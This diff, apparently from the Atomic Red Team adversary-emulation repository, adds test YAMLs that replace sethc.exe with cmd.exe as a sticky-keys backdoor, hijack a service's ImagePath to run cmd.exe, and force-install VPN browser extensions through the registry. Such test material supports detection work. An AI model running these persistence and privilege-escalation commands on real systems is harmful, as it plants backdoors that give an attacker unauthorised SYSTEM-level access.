Merge branch 'master' into patch-2

atomics/T1133/T1133.yaml

@@ -0,0 +1,47 @@
+---
+attack_technique: T1133  
+display_name: External Remote Services  
+
+atomic_tests:
+- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
+  description: |
+    Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    chrome_url:
+      description: chrome installer download URL
+      type: url
+      default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe
+    extension_id:
+      description: chrome extension id
+      type: String
+      default: | 
+        "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
+
+  dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
+  dependencies: # (optional)
+    - description: |
+        chrome must be installed
+      prereq_command: 'if (cmd /c "chrome 2>nul") {exit 0} else {exit 1}'
+      get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
+        Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
+        Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
+        
+  executor:
+    name: powershell
+    elevation_required: true
+    command: | # these are the actaul attack commands, at least one command must be provided
+      $extList = #{extension_id}
+      foreach ($extension in $extList) {
+        New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
+        New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
+      Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
+      Start-Sleep -Seconds 30
+      Stop-Process -Name "chrome"
+    cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
+      $extList = #{extension_id}
+      foreach ($extension in $extList) {
+      Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}

atomics/T1133/src/list of vpn extension.txt

@@ -0,0 +1,110 @@
+ZenMate VPN - fdcgdnkidjaadafnichfpabhfomcebme
+1clickVPN - fcfhplploccackoneaefokcmbjfbkenj
+Touch VPN - bihmplhobchoageeokmgbdihknkjbknd
+Hola Free VPN - gkojfkhlekighikafcpjkiklfbnlmeio
+Astar VPN - jajilbjjinjmgcibalaakngmkilboobh
+VPN Free - gjknjjomckknofjidppipffbpoekiipm
+Earth VPN - nabbmpekekjknlbkgpodfndbodhijjem
+DotVPN - kpiecbcckbofpmkkkdibbllpinceiihk
+Hotspot Shield Free VPN - nlbejmccbhkncgokjcmghpfloaajcffj
+Browsec VPN - omghfjlpggmjjaagoclmmobgdodcjboh
+VPN-free.pro - bibjcjfmgapbfoljiojpipaooddpkpai
+VPN Unlimited Free - mpcaainmfjjigeicjnlkdfajbioopjko
+PP VPN - jljopmgdobloagejpohpldgkiellmfnc
+IP Unblock - lochiccbgeohimldjooaakjllnafhaid
+Surf VPN - nhnfcgpcbfclhfafjlooihdfghaeinfc
+iNinja VPN - ookhnhpkphagefgdiemllfajmkdkcaim
+Daily VPN - namfblliamklmeodpcelkokjbffgmeoo
+Hoxx VPN Proxy - nbcojefnccbanplpoffopkoepjmhgdgh
+Free VPN - majdfhpaihoncoakbjgbdhglocklcgno
+VPN PROXY MASTER - lnfdmdhmfbimhhpaeocncdlhiodoblbd
+Urban Free VPN - eppiocemhmnlbhjplcgkofciiegomcon
+SaferVPN Proxy - cocfojppfigjeefejbpfmedgjbpchcng
+VPN Professional - foiopecknacmiihiocgdjgbjokkpkohc
+AdGuard VPN - hhdobjgopfphlmjbmnpglhfcgppchgje
+Free VPN - jgbaghohigdbgbolncodkdlpenhcmcge
+Free One Touch VPN - inligpkjkhbpifecbdjhmdpcfhnlelja
+Unlimited VPN & Proxy by ibVPN - higioemojdadgdbhbbbkfbebbdlfjbip
+RusVPN - hipncndjamdcmphkgngojegjblibadbe
+Azino VPN - iolonopooapdagdemdoaihahlfkncfgg
+Pron VPN - nhfjkakglbnnpkpldhjmpmmfefifedcj
+Free Residential VPN - jpgljfpmoofbmlieejglhonfofmahini
+ExpressVPN - fgddmllnllkalaagkghckoinaemmogpe
+Hotspot Shield Elite VPN Proxy - ejkaocphofnobjdedneohbbiilggdlbi
+Hide My IP VPN - keodbianoliadkoelloecbhllnpiocoi
+Tunnello VPN - hoapmlpnmpaehilehggglehfdlnoegck
+HMA VPN Proxy Unblocker - poeojclicodamonabcabmapamjkkmnnk
+Free Avira Phantom VPN - dfkdflfgjdajbhocmfjolpjbebdkcjog
+Hola VPN - kcdahmgmaagjhocpipbodaokikjkampi
+Free VPN for Chrome - klnkiajpmpkkkgpgbogmcgfjhdoljacg
+Hub VPN - lneaocagcijjdpkcabeanfpdbmapcjjg
+Free Proxy VPN - pgfpignfckbloagkfnamnolkeaecfgfh
+Private Internet Access - jplnlifepflhkbkgonidnobkakhmpnmh
+Turbo VPN for PC - jliodmnojccaloajphkingdnpljdhdok
+Windscribe - hnmpcagpplmpfojmgmnngilcnanddlhb
+CyberGhost VPN - ffbkglfijbcbgblgflchnbphjdllaogb
+VPN.AC - kcndmbbelllkmioekdagahekgimemejo
+Browser VPN - jdgilggpfmjpbodmhndmhojklgfdlhob
+DEEPRISM VPN - bihhflimonbpcfagfadcnbbdngpopnjb
+My Browser Vpn - ppajinakbfocjfnijggfndbdmjggcmde
+SetupVPN - oofgbpoabipfcfjapgnbbjjaenockbdp
+Wachee VPN - bhnhkdgoefpmekcgnccpnhjfdgicfebm
+Thunder Proxy - knmmpciebaoojcpjjoeonlcjacjopcpf
+Free Proxy VPN - dhadilbmmjiooceioladdphemaliiobo
+FastestVPN Proxy - jedieiamjmoflcknjdjhpieklepfglin
+WorkingVPN - mhngpdlhojliikfknhfaglpnddniijfh
+TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa
+BelkaVPN - npgimkapccfidfkfoklhpkgmhgfejhbj
+VPN Master - akeehkgglkmpapdnanoochpfmeghfdln
+Unblock Websites - gbmdmipapolaohpinhblmcnpmmlgfgje
+Lethean Proxy VPN - aigmfoeogfnljhnofglledbhhfegannp
+Whoer VPN - cgojmfochfikphincbhokimmmjenhhgk
+Best VPN USA - ficajfeojakddincjafebjmfiefcmanc
+FREE VPN DEWELOPMENT - ifnaibldjfdmaipaddffmgcmekjhiloa
+apkfold free vpn - jbnmpdkcfkochpanomnkhnafobppmccn
+Soul VPN - apcfdffemoinopelidncddjbhkiblecc
+DotVPN - mjolnodfokkkaichkcjipfgblbfgojpa
+rderzh VPN Proxy - oifjbnnafapeiknapihcmpeodaeblbkn
+Red Panda VPN - plpmggfglncceinmilojdkiijhmajkjh
+Ultrareach VPN - mjnbclmflcpookeapghfhapeffmpodij
+FastStunnel VPN - bblcccknbdbplgmdjnnikffefhdlobhp
+VirtualShield VPN - aojlhgbkmkahabcmcpifbolnoichfeep
+Adblock Office VPN Proxy Server - lcmammnjlbmlbcaniggmlejfjpjagiia
+Guru VPN & Proxy - knajdeaocbpmfghhmijicidfcmdgbdpm
+Malus VPN - bdlcnpceagnkjnjlbbbcepohejbheilk
+Muscle VPN - edknjdjielmpdlnllkdmaghlbpnmjmgb
+Push VPN - eidnihaadmmancegllknfbliaijfmkgo
+Gom VPN - ckiahbcmlmkpfiijecbpflfahoimklke
+Free Fast VPN - macdlemfnignjhclfcfichcdhiomgjjb
+BullVPN - chioafkonnhbpajpengbalkececleldf
+HideAll VPN - amnoibeflfphhplmckdbiajkjaoomgnj
+ProxyFlow - llbhddikeonkpbhpncnhialfbpnilcnc
+Cloud VPN - pcienlhnoficegnepejpfiklggkioccm
+sVPN - iocnglnmfkgfedpcemdflhkchokkfeii
+Social VPN - igahhbkcppaollcjeaaoapkijbnphfhb
+Trellonet Trellonet - njpmifchgidinihmijhcfpbdmglecdlb
+WindmillVPN - ggackgngljinccllcmbgnpgpllcjepgc
+IPBurger Proxy & VPN - kchocjcihdgkoplngjemhpplmmloanja 
+Veee - bnijmipndnicefcdbhgcjoognndbgkep
+Anonymous Proxy Vpn Browser - lklekjodgannjcccdlbicoamibgbdnmi
+Hideman VPN - dbdbnchagbkhknegmhgikkleoogjcfge
+Fornex VPN - egblhcjfjmbjajhjhpmnlekffgaemgfh
+WeVPN - ehbhfpfdkmhcpaehaooegfdflljcnfec
+VPNMatic - bkkgdjpomdnfemhhkalfkogckjdkcjkg
+Urban Shield - almalgbpmcfpdaopimbdchdliminoign
+Prime VPN - akkbkhnikoeojlhiiomohpdnkhbkhieh
+westwind - gbfgfbopcfokdpkdigfmoeaajfmpkbnh
+Upnet - bniikohfmajhdcffljgfeiklcbgffppl
+uVPN - lejgfmmlngaigdmmikblappdafcmkndb
+Nucleus VPN - ffhhkmlgedgcliajaedapkdfigdobcif
+Touch VPN - bihmplhobchoageeokmgbdihknkjbknd
+FoxyProxy Standard - gcknhkkoolaabfmlnjonogaaifnjlfnp
+GeoProxy - pooljnboifbodgifngpppfklhifechoe
+NordVPN - fjoaledfpmneenckfbpdfhkmimnjocfa
+ProxFlow - aakchaleigkohafkfjfjbblobjifikek
+Proxy SwitchySharp - dpplabbmogkhghncfbfdeeokoefdjegm
+Proxy SwitchyOmega - padekgcemlokbadohgkifijomclgjgif
+PureVPN - bfidboloedlamgdmenmlbipfnccokknp
+RusVPN - hipncndjamdcmphkgngojegjblibadbe
+SaferVPN - cocfojppfigjeefejbpfmedgjbpchcng
+TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa

atomics/T1218/T1218.yaml

@@ -122,4 +122,4 @@ atomic_tests:
     name: command_prompt
     elevation_required: false
     command: |
-      #{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"
+      "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"

atomics/T1546.008/T1546.008.yaml

@@ -25,7 +25,7 @@ atomic_tests:
       $input_table = "#{parent_list}".split(",")
       $Name = "Debugger"
       $Value = "#{attached_process}"
-      Foreach ($item in $input_table){   
+      Foreach ($item in $input_table){
         $item = $item.trim()
         $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
         IF(!(Test-Path $registryPath))
@@ -47,4 +47,19 @@ atomic_tests:
       }
     name: powershell
     elevation_required: true
-
+- name: Replace binary of sticky keys
+  auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
+  description: |
+    Replace sticky keys binary (sethc.exe) with cmd.exe
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+      takeown /F C:\Windows\System32\sethc.exe /A
+      icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
+    name: command_prompt
+    elevation_required: true

atomics/T1574.011/T1574.011.yaml

@@ -4,7 +4,7 @@ atomic_tests:
 - name: Service Registry Permissions Weakness
   auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
   description: |
-    Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. 
+    Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
     reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
   supported_platforms:
   - windows
@@ -17,4 +17,37 @@ atomic_tests:
     command: |
       get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
       get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
-    name: powershell
+    name: powershell
+- name: Service ImagePath Change with reg.exe
+  auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
+  description: |
+    Change Service registry ImagePath of a bengin service to a malicious file
+  supported_platforms:
+  - windows
+  input_arguments:
+    weak_service_name:
+      description: weak service name
+      type: String
+      default: calcservice
+    weak_service_path:
+      description: weak service path
+      type: String
+      default: '%windir%\system32\win32calc.exe'
+    malicious_service_path:
+      description: malicious service path
+      type: String
+      default: '%windir%\system32\cmd.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The service must exist (#{weak_service_name})
+    prereq_command: |
+      if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
+  executor:
+    command: |
+      reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}"
+    cleanup_command: |
+      sc.exe delete #{weak_service_name}
+    name: command_prompt